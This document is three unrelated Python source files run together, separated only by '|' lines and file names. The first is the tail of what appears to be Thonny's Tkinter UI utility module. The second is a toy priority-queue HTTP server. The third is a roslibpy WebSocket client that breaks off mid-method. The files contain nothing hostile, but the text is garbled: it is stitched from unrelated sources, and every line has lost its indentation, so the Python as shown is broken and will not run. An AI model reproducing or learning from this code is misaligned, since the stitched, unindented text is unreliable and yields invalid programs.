def create_boolean_var(value, modification_listener=None) -> EnhancedBooleanVar:
"""See create_string_var"""
return EnhancedBooleanVar(None, value, None, modification_listener)
def shift_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0001
def caps_lock_is_on(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0002
def control_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0004
def command_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0008
def modifier_is_pressed(event_state: int) -> bool:
return event_state != 0 and event_state != 0b10000
def get_hyperlink_cursor() -> str:
if running_on_mac_os():
return "pointinghand"
else:
return "hand2"
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
# remember handlers for certain shortcuts which require
# different treatment on non-latin keyboards
if sequence[0] != "<":
return None
parts = sequence.strip("<").strip(">").split("-")
# support only latin letters for now
if parts[-1].lower() not in list("abcdefghijklmnopqrstuvwxyz"):
return None
letter = parts.pop(-1)
if "Key" in parts:
parts.remove("Key")
if "key" in parts:
parts.remove("key")
modifiers = {part.lower() for part in parts}
if letter.isupper():
modifiers.add("shift")
if modifiers not in [{"control"}, {"control", "shift"}]:
# don't support others for now
return None
event_state = 0
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
for modifier in modifiers:
if modifier == "shift":
event_state |= 0x0001
elif modifier == "control":
event_state |= 0x0004
else:
# unsupported modifier
return None
# for latin letters keycode is same as its ascii code
return (event_state, ord(letter.upper()))
def select_sequence(win_version, mac_version, linux_version=None):
if running_on_windows():
return win_version
elif running_on_mac_os():
return mac_version
elif running_on_linux() and linux_version:
return linux_version
else:
return win_version
def try_remove_linenumbers(text, master):
try:
if has_line_numbers(text) and messagebox.askyesno(
title="Remove linenumbers",
message="Do you want to remove linenumbers from pasted text?",
default=messagebox.YES,
master=master,
):
return remove_line_numbers(text)
else:
return text
except Exception:
traceback.print_exc()
return text
def has_line_numbers(text):
lines = text.splitlines()
return len(lines) > 2 and all([len(split_after_line_number(line)) == 2 for line in lines])
def split_after_line_number(s):
parts = re.split(r"(^\s*\d+\.?)", s)
if len(parts) == 1:
return parts
else:
assert len(parts) == 3 and parts[0] == ""
return parts[1:]
def remove_line_numbers(s):
cleaned_lines = []
for line in s.splitlines():
parts = split_after_line_number(line)
if len(parts) != 2:
return s
else:
cleaned_lines.append(parts[1])
return textwrap.dedent(("\n".join(cleaned_lines)) + "\n")
def center_window(win, master=None):
# for backward compat
return assign_geometry(win, master)
def assign_geometry(win, master=None, min_left=0, min_top=0):
if master is None:
master = tk._default_root
size = get_workbench().get_option(get_size_option_name(win))
if size:
width, height = size
saved_size = True
else:
fallback_width = 600
fallback_height = 400
# need to wait until size is computed
# (unfortunately this causes dialog to jump)
if getattr(master, "initializing", False):
# can't get reliable positions when main window is not in mainloop yet
width = fallback_width
height = fallback_height
else:
if not running_on_linux():
# better to avoid in Linux because it causes ugly jump
win.update_idletasks()
# looks like it doesn't take window border into account
width = win.winfo_width()
height = win.winfo_height()
if width < 10:
# ie. size measurement is not correct
width = fallback_width
height = fallback_height
saved_size = False
left = master.winfo_rootx() + master.winfo_width() // 2 - width // 2
top = master.winfo_rooty() + master.winfo_height() // 2 - height // 2
left = max(left, min_left)
top = max(top, min_top)
if saved_size:
win.geometry("%dx%d+%d+%d" % (width, height, left, top))
else:
win.geometry("+%d+%d" % (left, top))
class WaitingDialog(CommonDialog):
def __init__(self, master, async_result, description, title="Please wait!", timeout=None):
self._async_result = async_result
super().__init__(master)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
self.title(title)
self.resizable(height=tk.FALSE, width=tk.FALSE)
# self.protocol("WM_DELETE_WINDOW", self._close)
self.desc_label = ttk.Label(self, text=description, wraplength=300)
self.desc_label.grid(padx=20, pady=20)
self.update_idletasks()
self.timeout = timeout
self.start_time = time.time()
self.after(500, self._poll)
def _poll(self):
if self._async_result.ready():
self._close()
elif self.timeout and time.time() - self.start_time > self.timeout:
raise TimeoutError()
else:
self.after(500, self._poll)
self.desc_label["text"] = self.desc_label["text"] + "."
def _close(self):
self.destroy()
def run_with_waiting_dialog(master, action, args=(), description="Working"):
# http://stackoverflow.com/a/14299004/261181
from multiprocessing.pool import ThreadPool
pool = ThreadPool(processes=1)
async_result = pool.apply_async(action, args)
dlg = WaitingDialog(master, async_result, description=description)
show_dialog(dlg, master)
return async_result.get()
class FileCopyDialog(CommonDialog):
def __init__(self, master, source, destination, description=None, fsync=True):
self._source = source
self._destination = destination
self._old_bytes_copied = 0
self._bytes_copied = 0
self._fsync = fsync
self._done = False
self._cancelled = False
self._closed = False
super().__init__(master)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(row=0, column=0, sticky="nsew")
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.title(tr("Copying"))
if description is None:
description = tr("Copying\n %s\nto\n %s") % (source, destination)
label = ttk.Label(main_frame, text=description)
label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)
self._bar = ttk.Progressbar(main_frame, maximum=os.path.getsize(source), length=200)
self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)
self._cancel_button = ttk.Button(main_frame, text=tr("Cancel"), command=self._cancel)
self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
self._bar.focus_set()
main_frame.columnconfigure(0, weight=1)
self._update_progress()
self.bind("<Escape>", self._cancel, True) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._cancel)
self._start()
def _start(self):
def work():
self._copy_progess = 0
with open(self._source, "rb") as fsrc:
with open(self._destination, "wb") as fdst:
while True:
buf = fsrc.read(16 * 1024)
if not buf:
break
fdst.write(buf)
fdst.flush()
if self._fsync:
os.fsync(fdst)
self._bytes_copied += len(buf)
self._done = True
threading.Thread(target=work, daemon=True).start()
def _update_progress(self):
if self._done:
if not self._closed:
self._close()
return
self._bar.step(self._bytes_copied - self._old_bytes_copied)
self._old_bytes_copied = self._bytes_copied
self.after(100, self._update_progress)
def _close(self):
self.destroy()
self._closed = True
def _cancel(self, event=None):
self._cancelled = True
self._close()
class ChoiceDialog(CommonDialogEx):
def __init__(
self,
master=None,
title="Choose one",
question: str = "Choose one:",
choices=[],
initial_choice_index=None,
) -> None:
super().__init__(master=master)
self.title(title)
self.resizable(False, False)
self.main_frame.columnconfigure(0, weight=1)
row = 0
question_label = ttk.Label(self.main_frame, text=question)
question_label.grid(row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20)
row += 1
self.var = tk.StringVar("")
if initial_choice_index is not None:
self.var.set(choices[initial_choice_index])
for choice in choices:
rb = ttk.Radiobutton(self.main_frame, text=choice, variable=self.var, value=choice)
rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
row += 1
ok_button = ttk.Button(self.main_frame, text=tr("OK"), command=self._ok, default="active")
ok_button.grid(row=row, column=0, sticky="e", pady=20)
cancel_button = ttk.Button(self.main_frame, text=tr("Cancel"), command=self._cancel)
cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)
self.bind("<Escape>", self._cancel, True)
self.bind("<Return>", self._ok, True)
self.protocol("WM_DELETE_WINDOW", self._cancel)
def _ok(self):
self.result = self.var.get()
if not self.result:
self.result = None
self.destroy()
def _cancel(self):
self.result = None
self.destroy()
class LongTextDialog(CommonDialog):
def __init__(self, title, text_content, parent=None):
if parent is None:
parent = tk._default_root
super().__init__(master=parent)
self.title(title)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
default_font = tk.font.nametofont("TkDefaultFont")
self._text = tktextext.TextFrame(
main_frame,
read_only=True,
wrap="none",
font=default_font,
width=80,
height=10,
relief="sunken",
borderwidth=1,
)
self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
self._text.text.direct_insert("1.0", text_content)
self._text.text.see("1.0")
copy_button = ttk.Button(
main_frame, command=self._copy, text=tr("Copy to clipboard"), width=20
)
copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))
close_button = ttk.Button(
main_frame, command=self._close, text=tr("Close"), default="active"
)
close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
close_button.focus_set()
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close, True)
def _copy(self, event=None):
self.clipboard_clear()
self.clipboard_append(self._text.text.get("1.0", "end"))
def _close(self, event=None):
self.destroy()
def ask_one_from_choices(
master=None,
title="Choose one",
question: str = "Choose one:",
choices=[],
initial_choice_index=None,
):
dlg = ChoiceDialog(master, title, question, choices, initial_choice_index)
show_dialog(dlg, master)
return dlg.result
def get_busy_cursor():
if running_on_windows():
return "wait"
elif running_on_mac_os():
return "spinning"
else:
return "watch"
def get_tk_version_str():
return tk._default_root.tk.call("info", "patchlevel")
def get_tk_version_info():
result = []
for part in get_tk_version_str().split("."):
try:
result.append(int(part))
except Exception:
result.append(0)
return tuple(result)
def get_style_configuration(style_name, default={}):
style = ttk.Style()
# NB! style.configure seems to reuse the returned dict
# Don't change it without copying first
result = style.configure(style_name)
if result is None:
return default
else:
return result
def lookup_style_option(style_name, option_name, default=None):
style = ttk.Style()
setting = style.lookup(style_name, option_name)
if setting in [None, ""]:
return default
elif setting == "True":
return True
elif setting == "False":
return False
else:
return setting
def scale(value):
return get_workbench().scale(value)
def open_path_in_system_file_manager(path):
if running_on_mac_os():
# http://stackoverflow.com/a/3520693/261181
# -R doesn't allow showing hidden folders
subprocess.Popen(["open", path])
elif running_on_linux():
subprocess.Popen(["xdg-open", path])
else:
assert running_on_windows()
subprocess.Popen(["explorer", path])
def _get_dialog_provider():
if platform.system() != "Linux" or get_workbench().get_option("file.avoid_zenity"):
return filedialog
import shutil
if shutil.which("zenity"):
return _ZenityDialogProvider
# fallback
return filedialog
def asksaveasfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
_check_dialog_parent(options)
return _get_dialog_provider().asksaveasfilename(**options)
def askopenfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_check_dialog_parent(options)
return _get_dialog_provider().askopenfilename(**options)
def askopenfilenames(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_check_dialog_parent(options)
return _get_dialog_provider().askopenfilenames(**options)
def askdirectory(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
_check_dialog_parent(options)
return _get_dialog_provider().askdirectory(**options)
def _check_dialog_parent(options):
if options.get("parent") and options.get("master"):
parent = options["parent"].winfo_toplevel()
master = options["master"].winfo_toplevel()
if parent is not master:
logger.warning(
"Dialog with different parent/master toplevels:\n%s",
"".join(traceback.format_stack()),
)
elif options.get("parent"):
parent = options["parent"].winfo_toplevel()
master = options["parent"].winfo_toplevel()
elif options.get("master"):
parent = options["master"].winfo_toplevel()
master = options["master"].winfo_toplevel()
else:
logger.warning("Dialog without parent:\n%s", "".join(traceback.format_stack()))
parent = tk._default_root
master = tk._default_root
options["parent"] = parent
options["master"] = master
if running_on_mac_os():
# used to require master/parent (https://bugs.python.org/issue34927)
# but this is deprecated in Catalina (https://github.com/thonny/thonny/issues/840)
# TODO: Consider removing this when upgrading from Tk 8.6.8
del options["master"]
del options["parent"]
class _ZenityDialogProvider:
# https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
# http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
# http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
# another possibility is to use PyGobject: https://github.com/poulp/zenipy
@classmethod
def askopenfilename(cls, **options):
args = cls._convert_common_options("Open file", **options)
return cls._call(args)
@classmethod
def askopenfilenames(cls, **options):
args = cls._convert_common_options("Open files", **options)
return cls._call(args + ["--multiple"]).split("|")
@classmethod
def asksaveasfilename(cls, **options):
args = cls._convert_common_options("Save as", **options)
args.append("--save")
if options.get("confirmoverwrite", True):
args.append("--confirm-overwrite")
filename = cls._call(args)
if not filename:
return None
if "defaultextension" in options and "." not in os.path.basename(filename):
filename += options["defaultextension"]
return filename
@classmethod
def askdirectory(cls, **options):
args = cls._convert_common_options("Select directory", **options)
args.append("--directory")
return cls._call(args)
@classmethod
def _convert_common_options(cls, default_title, **options):
args = ["--file-selection", "--title=%s" % options.get("title", default_title)]
filename = _options_to_zenity_filename(options)
if filename:
args.append("--filename=%s" % filename)
parent = options.get("parent", options.get("master", None))
if parent is not None:
args.append("--modal")
args.append("--attach=%s" % hex(parent.winfo_id()))
for desc, pattern in options.get("filetypes", ()):
# zenity requires star before extension
pattern = pattern.replace(" .", " *.")
if pattern.startswith("."):
pattern = "*" + pattern
if pattern == "*.*":
# ".*" was provided to make the pattern safe for Tk dialog
# not required with Zenity
pattern = "*"
args.append("--file-filter=%s | %s" % (desc, pattern))
return args
@classmethod
def _call(cls, args):
args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
result = subprocess.run(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if result.returncode == 0:
return result.stdout.strip()
else:
# TODO: log problems
print(result.stderr, file=sys.stderr)
# could check stderr, but it may contain irrelevant warnings
return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
res = sequence_to_event_state_and_keycode(sequence)
if res is not None:
if res not in registry:
registry[res] = []
registry[res].append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
# tries to handle Ctrl+LatinLetter shortcuts
# given from non-Latin keyboards
# See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
# only consider events with Control held
if not event.state & 0x04:
return
if running_on_mac_os():
return
# consider only part of the state,
# because at least on Windows, Ctrl-shortcuts' state
# has something extra
simplified_state = 0x04
if shift_is_pressed(event.state):
simplified_state |= 0x01
# print(simplified_state, event.keycode)
if (simplified_state, event.keycode) in registry:
if event.keycode != ord(event.char) and event.keysym in (None, "??"):
# keycode and char doesn't match,
# this means non-latin keyboard
for handler, tester in registry[(simplified_state, event.keycode)]:
if tester is None or tester():
handler()
def show_dialog(dlg, master=None, geometry=True, min_left=0, min_top=0):
if getattr(dlg, "closed", False):
return
if master is None:
master = getattr(dlg, "parent", None) or getattr(dlg, "master", None) or tk._default_root
master = master.winfo_toplevel()
get_workbench().event_generate("WindowFocusOut")
# following order seems to give most smooth appearance
focused_widget = master.focus_get()
dlg.transient(master.winfo_toplevel())
if geometry:
# dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
if isinstance(geometry, str):
dlg.geometry(geometry)
else:
assign_geometry(dlg, master, min_left, min_top)
# dlg.wm_deiconify()
dlg.lift()
dlg.focus_set()
try:
dlg.grab_set()
except TclError as e:
print("Can't grab:", e, file=sys.stderr)
master.winfo_toplevel().wait_window(dlg)
dlg.grab_release()
master.winfo_toplevel().lift()
master.winfo_toplevel().focus_force()
master.winfo_toplevel().grab_set()
if running_on_mac_os():
master.winfo_toplevel().grab_release()
if focused_widget is not None:
try:
focused_widget.focus_force()
except TclError:
pass
def popen_with_ui_thread_callback(*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs):
if "encoding" not in Popen_kwargs:
if "env" not in Popen_kwargs:
Popen_kwargs["env"] = os.environ.copy()
Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
if sys.version_info >= (3, 6):
Popen_kwargs["encoding"] = "utf-8"
proc = subprocess.Popen(*Popen_args, **Popen_kwargs)
# Need to read in thread in order to avoid blocking because
# of full pipe buffer (see https://bugs.python.org/issue1256)
out_lines = []
err_lines = []
def read_stream(stream, target_list):
while True:
line = stream.readline()
if line:
target_list.append(line)
else:
break
t_out = threading.Thread(target=read_stream, daemon=True, args=(proc.stdout, out_lines))
t_err = threading.Thread(target=read_stream, daemon=True, args=(proc.stderr, err_lines))
t_out.start()
t_err.start()
def poll():
if proc.poll() is not None:
t_out.join(3)
t_err.join(3)
on_completion(proc, out_lines, err_lines)
return
tk._default_root.after(int(poll_delay * 1000), poll)
poll()
return proc
class MenuEx(tk.Menu):
def __init__(self, target):
self._testers = {}
super().__init__(
target, tearoff=False, postcommand=self.on_post, **get_style_configuration("Menu")
)
def on_post(self, *args):
self.update_item_availability()
def update_item_availability(self):
for i in range(self.index("end") + 1):
item_data = self.entryconfigure(i)
if "label" in item_data:
tester = self._testers.get(item_data["label"])
if tester and not tester():
self.entryconfigure(i, state=tk.DISABLED)
else:
self.entryconfigure(i, state=tk.NORMAL)
def add(self, itemType, cnf={}, **kw):
cnf = cnf or kw
tester = cnf.get("tester")
if "tester" in cnf:
del cnf["tester"]
super().add(itemType, cnf)
itemdata = self.entryconfigure(self.index("end"))
labeldata = itemdata.get("label")
if labeldata:
self._testers[labeldata] = tester
class TextMenu(MenuEx):
def __init__(self, target):
self.text = target
MenuEx.__init__(self, target)
self.add_basic_items()
self.add_extra_items()
def add_basic_items(self):
self.add_command(label=tr("Cut"), command=self.on_cut, tester=self.can_cut)
self.add_command(label=tr("Copy"), command=self.on_copy, tester=self.can_copy)
self.add_command(label=tr("Paste"), command=self.on_paste, tester=self.can_paste)
def add_extra_items(self):
self.add_separator()
self.add_command(label=tr("Select All"), command=self.on_select_all)
def on_cut(self):
self.text.event_generate("<<Cut>>")
def on_copy(self):
self.text.event_generate("<<Copy>>")
def on_paste(self):
self.text.event_generate("<<Paste>>")
def on_select_all(self):
self.text.event_generate("<<SelectAll>>")
def can_cut(self):
return self.get_selected_text() and not self.selection_is_read_only()
def can_copy(self):
return self.get_selected_text()
def can_paste(self):
return not self.selection_is_read_only()
def get_selected_text(self):
try:
return self.text.get("sel.first", "sel.last")
except TclError:
return ""
def selection_is_read_only(self):
if hasattr(self.text, "is_read_only"):
return self.text.is_read_only()
return False
def create_url_label(master, url, text=None):
import webbrowser
return create_action_label(master, text or url, lambda _: webbrowser.open(url))
def create_action_label(master, text, click_handler, **kw):
url_font = tkinter.font.nametofont("TkDefaultFont").copy()
url_font.configure(underline=1)
url_label = ttk.Label(
master, text=text, style="Url.TLabel", cursor=get_hyperlink_cursor(), font=url_font, **kw
)
url_label.bind("<Button-1>", click_handler)
return url_label
def get_size_option_name(window):
return "layout." + type(window).__name__ + "_size"
def get_default_theme():
if running_on_windows():
return "Windows"
elif running_on_rpi():
return "Raspberry Pi"
else:
return "Enhanced Clam"
def get_default_basic_theme():
if running_on_windows():
return "vista"
else:
return "clam"
EM_WIDTH = None
def ems_to_pixels(x):
global EM_WIDTH
if EM_WIDTH is None:
EM_WIDTH = tkinter.font.nametofont("TkDefaultFont").measure("m")
return int(EM_WIDTH * x)
_btn_padding = None
def set_text_if_different(widget, text) -> bool:
if widget["text"] != text:
widget["text"] = text
return True
else:
return False
def tr_btn(s):
"""Translates button caption, adds padding to make sure text fits"""
global _btn_padding
if _btn_padding is None:
_btn_padding = get_button_padding()
return _btn_padding + tr(s) + _btn_padding
def add_messagebox_parent_checker():
def wrap_with_parent_checker(original):
def wrapper(*args, **options):
_check_dialog_parent(options)
return original(*args, **options)
return wrapper
from tkinter import messagebox
for name in [
"showinfo",
"showwarning",
"showerror",
"askquestion",
"askokcancel",
"askyesno",
"askyesnocancel",
"askretrycancel",
]:
fun = getattr(messagebox, name)
setattr(messagebox, name, wrap_with_parent_checker(fun))
if __name__ == "__main__":
root = tk.Tk()
|
server.py
|
import socket
import queue
import threading
import logging
import collections
import time
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
# Container for an HTTP Request
Request = collections.namedtuple('Request', [
'method',
'path',
'http_version',
'sock',
])
class HttpServerWithPriorities:
"""
HTTP Server that has different priorities based on the request.
This is a toy http server that has two queues, one with high priority and one with low priority. All requests go to
the low priority queue except for the requests that go to '/ping'. The high priority queue will be checked first by
any thread that is looking for a new request to process thus giving it priority. If `num_high_priority_threads` is
specified, a thread pool will be created to process only high priority requests.
"""
def __init__(self, sock=None, port=8081, host='0.0.0.0', num_threads=4, num_high_priority_threads=0, debug_queues=False):
"""
Constructor for HttpServerWithPriorities. Will create the socket and bind it (if a socket is not provided). Will
also create the threadpool specified. None of the threads will be started, call the `run()` method to start
the server.
:param sock: optionally specify the socket (if not specified, a new socket will be created).
:param port: port to bind the socket to (only relevant if a socket is not passed).
:param host: host to bind the socket to (only relevant if a socket is not passed).
:param num_threads: number of threads that will fulfill the HTTP Requests (should be greater than 0).
:param num_high_priority_threads: number of threads that will fulfill high priority HTTP Requests (can be zero).
:param debug_queues: True to create a monitor thread that reports on the status of the queues.
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen()
self._sock = sock
self._sock = sock
self._queues = {
'high': queue.Queue(),
'low': queue.Queue(),
}
self._cv = threading.Condition()
self.request_queue = queue.Queue()
self._threads = [threading.Thread(target=self._worker_target) for _ in range(num_threads)]
self._high_priority_threads = [threading.Thread(target=self._high_priority_target) for _ in range(num_high_priority_threads)]
self._queue_monitor = threading.Thread(target=self._monitor_queues) if debug_queues else None
self._running = True
def run(self):
"""
Starts the worker threads, the high priority threads and the queue monitor thread (if needed). Then starts
accepting connections.
:return: None
"""
logger.info('Starting %s worker threads', len(self._threads))
for t in self._threads:
t.start()
logger.info('Starring %s high priority worker threads', len(self._high_priority_threads))
for t in self._high_priority_threads:
t.start()
if self._queue_monitor:
self._queue_monitor.start();
while self._running:
logger.debug("Waiting for connection...")
(client_socket, address) = self._sock.accept()
logger.info("Connection from %s", address)
# Maybe add to a queue instead? Right now we're creating a thread per request to enqueue it.
threading.Thread(target=self._request_triage, args=(client_socket,)).start()
def clean(self):
"""
Stops all threads and closes the sockets.
:return: None
"""
logger.info("Stopping the server")
self._running = False
self._cv.acquire()
self._cv.notify_all()
self._cv.release()
logger.info("Waiting for threads to finish...")
for t in self._threads:
t.join()
for t in self._high_priority_threads:
t.join()
if self._queue_monitor:
self._queue_monitor.join()
logger.info("Closing socket")
self._sock.close()
def _worker_target(self):
"""
This is the target for the threadpool.
Checks the queue when notified and processes handles the request. Tries to get from the higher priority queue
first.
:return: None
"""
while self._running:
self._cv.acquire()
while not self._something_in_queue():
if not self._running:
self._cv.release()
return
self._cv.wait()
logger.debug("_worker_target notified")
request = self._get_existing_request()
logger.info("worker thread dequeued request(%s)", request)
self._cv.release()
self._handle_request(request)
def _high_priority_target(self):
while self._running:
self._cv.acquire()
while not self._something_in_high_priority_queue():
if not self._running:
self._cv.release()
return
self._cv.notify() # we're swallowing a notify if we don't process a low priority request
self._cv.wait()
logger.debug("_high_priority_target notified")
request = self._get_existing_request() # should be guaranteed to be high priority
logger.info("High priority thread dequeued request(%s)", request)
self._cv.release()
self._handle_request(request)
def _handle_request(self, request):
"""
Depending on the request path will write a response body. If the request path is '/long', it will sleep to
emulate a request that takes a while and then will send the response. Also, closes the socket.
:param request: Request object.
:return: None
"""
body = b'Hello world'
if request.path == '/ping':
body = b'healthy'
elif request.path == '/long':
logger.debug("Sleeping for one second to simulate a long request")
time.sleep(1)
logger.debug('Woke up from thread.sleep')
body = b'Long long'
self._write_response(request, body)
request.sock.close()
def _monitor_queues(self):
"""
Target for the queue_monitor thread. Checks the state of ach queue and prints a debug message.
:return: None
"""
while self._running:
for priority in self._queues:
logger.debug("queues[%s].empty() = %s", priority, self._queues[priority].empty())
time.sleep(3)
def _get_existing_request(self):
"""
Gets an existing request from one of the queues. It will try to get the Request from the 'high' priority queue
first giving it priority. This should be called with a lock and being sure that one of the queues has one
request.
:return: Request the enqueued request.
"""
if not self._queues['high'].empty():
return self._queues['high'].get_nowait() # Should be guaranteed
return self._queues['low'].get_nowait()
def _something_in_high_priority_queue(self):
"""
Returns True if there is at least one Request in the 'high' priority queue. Must be called with the lock held.
:return: boolean
"""
return not self._queues['high'].empty()
def _something_in_queue(self):
"""
Returns True if there is at least one Request in any of the queues. Must be called holding the lock held.
:return boolean
"""
for key in self._queues:
if not self._queues[key].empty():
return True
return False
def _request_triage(self, client_socket):
"""
Get the request and enqueue it in the right queue.
:return None
"""
# might return None if there's an error
request = self._get_request(client_socket)
if request:
logger.info("request(%s)", request)
self._enqueue_request(request)
def _enqueue_request(self, request):
"""
Enqueues the request in the appropriate queue.
:param request: request to enqueue.
:return: None
"""
self._cv.acquire()
request_queue = self._get_request_queue(request)
request_queue.put(request)
self._cv.notify()
self._cv.release()
def _get_request_queue(self, request):
"""
Returns the request queue based on the priority that the request has.
:param request: request to enqueue.
:return: queue for the request.
"""
priority = self._get_request_priority(request)
logger.debug("%s has priority(%s)", request, priority)
return self._queues[priority]
def _get_request_priority(self, request):
"""
Returns the request priority depending on the request's path.
:param request: Request to get the priority from.
:return: str 'high'/'low' depending of the priority of the request.
"""
if request.path == '/ping':
return 'high'
return 'low'
def _get_request(self, client_socket):
"""
Reads the first line of the HTTP request and returns a Request object. Returns None if there is an error reading
or parsing the request.
:param client_socket: socket to read the HTTP request from.
:return: Request or None if there is an error.
"""
logger.debug("Reading data")
data = b''
while True:
temp_data = client_socket.recv(1024)
if not temp_data:
break
data += temp_data
if b'\r\n' in data:
break
first_line = str(data.split(b'\r\n')[0], encoding='UTF-8')
try:
method, path, version = first_line.split()
return Request(method=method, path=path, http_version=version, sock=client_socket)
except:
logger.error("First line seems to be wrong '%s'", first_line)
logger.info("Ignoring error and closing socket")
client_socket.close()
return None
def _write_response(self, request, body):
"""
Writes the response to a request.
:param request: request to write a response to.
:param body: body of the response in bytes.
:return: None
"""
client_socket = request.sock
length = len(body) + 1 # not sure why + 1
response = b"\n".join([
b'HTTP/1.1 200 OK',
b'Connection: Close',
b'Content-Length: ' + bytes(str(length), encoding='UTF-8'),
b"\n",
body,
])
client_socket.send(response)
def main():
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('-H', '--host', required=False, default='0.0.0.0', help='host to bind the socket to.')
ap.add_argument('-p', '--port', required=False, type=int, default=8081, help='port to bind the socket to.')
ap.add_argument('-n', '--num-threads', required=False, type=int, default=4, help='number of worker threads that will be processing http requests')
ap.add_argument('-i', '--num-high-priority-threads', required=False, type=int, default=0, help='number of high priority threads that will be processing high priority http requests')
ap.add_argument('-d', '--debug-queues', required=False, action='store_true', help='activate an extra thread to report on status of queues')
args = vars(ap.parse_args())
logger.debug("Running with args %s", args)
server = HttpServerWithPriorities(**args)
try:
server.run()
except KeyboardInterrupt:
server.clean()
if __name__ == '__main__':
main()
|
comm_autobahn.py
|
from __future__ import print_function
import logging
import threading
from autobahn.twisted.websocket import WebSocketClientFactory
from autobahn.twisted.websocket import WebSocketClientProtocol
from autobahn.twisted.websocket import connectWS
from autobahn.websocket.util import create_url
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet import threads
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.python import log
from ..event_emitter import EventEmitterMixin
from . import RosBridgeProtocol
LOGGER = logging.getLogger('roslibpy')
class AutobahnRosBridgeProtocol(RosBridgeProtocol, WebSocketClientProtocol):
def __init__(self, *args, **kwargs):
super(AutobahnRosBridgeProtocol, self).__init__(*args, **kwargs)
def onConnect(self, response):
LOGGER.debug('Server connected: %s', response.peer)
def onOpen(self):
LOGGER.info('Connection to ROS MASTER ready.')
self._manual_disconnect = False
self.factory.ready(self)
def onMessage(self, payload, isBinary):
if isBinary:
raise NotImplementedError('Add support for binary messages')
try:
self.on_message(payload)
except Exception:
LOGGER.exception('Exception on start_listening while trying to handle message received.' +
'It could indicate a bug in user code on message handlers. Message skipped.')
def onClose(self, wasClean, code, reason):
LOGGER.info('WebSocket connection closed: Code=%s, Reason=%s', str(code), reason)
def send_message(self, payload):
return self.sendMessage(payload, isBinary=False, fragmentSize=None, sync=False, doNotCompress=False)
def send_close(self):
self._manual_disconnect = True
self.sendClose()
class AutobahnRosBridgeClientFactory(EventEmitterMixin, ReconnectingClientFactory, WebSocketClientFactory):
"""Factory to create instances of the ROS Bridge protocol built on top of Autobahn/Twisted."""
protocol = AutobahnRosBridgeProtocol
def __init__(self, *args, **kwargs):
super(AutobahnRosBridgeClientFactory, self).__init__(*args, **kwargs)
self._proto = None
self._manager = None
self.connector = None
self.setProtocolOptions(closeHandshakeTimeout=5)
def connect(self):
"""Establish WebSocket connection to the ROS server defined for this factory."""
self.connector = connectWS(self)
@property
def is_connected(self):
"""Indicate if the WebSocket connection is open or not.
Returns:
bool: True if WebSocket is connected, False otherwise.
"""
return self.connector and self.connector.state == 'connected'
def on_ready(self, callback):
if self._proto:
callback(self._proto)
else:
self.once('ready', callback)
def ready(self, proto):
self.resetDelay()
self._proto = proto
self.emit('ready', proto)
def startedConnecting(self, connector):
LOGGER.debug('Started to connect...')
def clientConnectionLost(self, connector, reason):
LOGGER.debug('Lost connection. Reason: %s', reason)
self.emit('close', self._proto)
if not self._proto or (self._proto and not self._proto._manual_disconnect):
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
self._proto = None
def clientConnectionFailed(self, connector, reason):
